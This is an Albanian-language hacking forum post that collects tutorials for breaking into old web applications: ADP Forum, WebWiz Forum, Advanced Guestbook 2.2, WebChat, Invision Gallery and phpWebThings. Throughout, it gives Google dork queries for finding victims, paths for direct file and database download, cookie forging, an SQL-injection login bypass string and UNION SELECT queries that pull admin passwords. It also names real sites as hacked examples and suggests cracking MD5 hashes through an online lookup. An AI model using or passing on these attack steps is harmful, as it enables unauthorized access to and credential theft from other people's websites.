qe ktu osht e paraqit sesi mundemi mi hack disa faqe Laughing
Exploit per ADP Forum Gjith versionet
Ne fillim shko ne google dhe gjej nje forum powered by adp forum.
Kerko keshtu:
"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"
Po marrim nje shembull. per forumet powered by adp forum:
http://www.adp.host.sk/Forum203/tani qe te hackim passin e adminit e beni keshtu.Gjeni kush eshte admini.Kete e gjen te Lista e antareve,memberi i pare eshte admini.Ne kete rast
http://www.adp.host.sk/Forum203/- username i adminit eshte admin.Tani
qe te marrim passin bejme keshtu:
http://www.adp.host.sk/Forum203/users/admin.txtose (psh ne qoftse emri i adminit eshte gladiator e bejme keshtu:
http://www.adp.host.sk/Forum203/users/gladiator.txt)
dhe dalin te dhanat e adminit.Aty del edhe md5hash qe ne kete rast eshte:
21232f297a57a5a743894a0e4a801fc3
Tani merr kete hash e fut ne:
http://gdataonline.com/seekhash.php dhe e gjen passwordin.Ai eshte passwordi i adminit.
Tani futesh ne forum me accountin e adminit dhe e ke ne dore forumin.Smile
Nqs tutorialet nga gsecurity i postoni ne foruma te tjere ose weba te tjere duhet ta shkruani ne fund
MARRE NGA
http://www.gladiator-security.org___________________________________________
Si Te Hackim WebWiz Forum -
se pari gjejm ne google nje webwiz duke kerkuar kshtu :
"Powered by web wiz forum"
me pas e caktojm viktimen edhe ja nisim.
shkarkojm nje cookie editor sikur ktu :
http://www.cookieeditor.com/ edhe me pas vazhdojm punes. mbrapa webfaqes ja shtojm ket :
/admin/database/wwForum.mdb
dhe do te behet kshtu :
viktima.com/admin/database/wwForum.mdb
dhe e shkarkojm qat[ filen .mdb ] , edhe masi mbarohet shkarkimi
e hapim ate me microsoft access , dhe kur ta hapim del nje tabel dhe shkrun diqka : admin user_code dhe me cookie editor do te hapim pjesen Valvue dhe do te bejm paste at kodin e fituar tek tabela tek user_code ,
dhe me pas do te bejm save cookie editorin dhe do te mshelim Browserin do te qelim prap siten dhe shifni se automatikisht keni hyre si admin.
hackime te kendshem !!!
__________________________________________________ __________________________________________
Advanced Guestbook 2.2 - NEW!!!
Se Pari kErkojm ne google kshtu :
intitle:guestbook "advanced guestbook 2.2 powered"
me pas mbasi e gjejm GuestBook-in qe dojm me hack veprojm kshtu :
http://www.viktima.com/advancedguestbook/admin.phpmasi e hyjm ne ate link do ta lyp Passwordin dhe Usernamen e Adminit
ne Username e lejm Shprast(Bosh) ne Password Shenojm kshtu :
') OR ('a' = 'a
edhe u kry ju keni depertuar ne Admin
Exploitat Tanл Punojn 100%
________________________________________________
WebChat Hacking...
Se Pari kErkojm ne google kshtu : "webchat/login.php?rid=1"
pastaj e zgjedhi armikun qe dojm me hack . si p.sh :
http://www.emriiwebit.com/webchat/pasi qe e gjejm mbrapa ja shtojm admin.php edhe bohet :
http://www.emriiwebit.com/webchat/admin.phpedhe pasi qe hyjm ne admin.php lyp username dhe password , ne ja shtojm ket:
/admin2.php/
edhe bohet kshtu :
http://www.emriiwebit.com/webchat/admin/admin2.phpkshtu qe kemi hyr ne admin panel .
Si shembull qe u hack :
http://www.solaresdeportugal.com/webchat/choise.phpExploitet Tona Punojn 100% , Kalofshi Bukur
__________________________________________________ ________________
Invision Gallery 2.0.3
se pari lypim ne google "invision Gallery 2.0.3
me pas shkojme kshtu . Regjistrohemi ne at web qe dojm me hack
edhe e qesim ket kod :
http://www.site.com/index.php?automo...une_key=30&st=Exploiti Punon 100% . Pershednetje
__________________________________________________ __
PHPWEBTHING exploit
Exploit :
http://xxx.com/forum.php?forum=[XSS]http://xxx.com/forum.php?forum=[SQL]Shembull :
SQL
Per admin password
http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*
Per admin username
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*
kerko ne google: " This website was created with phpWebThings 1.4."
mund te provoni a punon ne kete website.se un e kam provuar dhe kam pas sukses.
http://www.powerplayrocks.com/phpwt/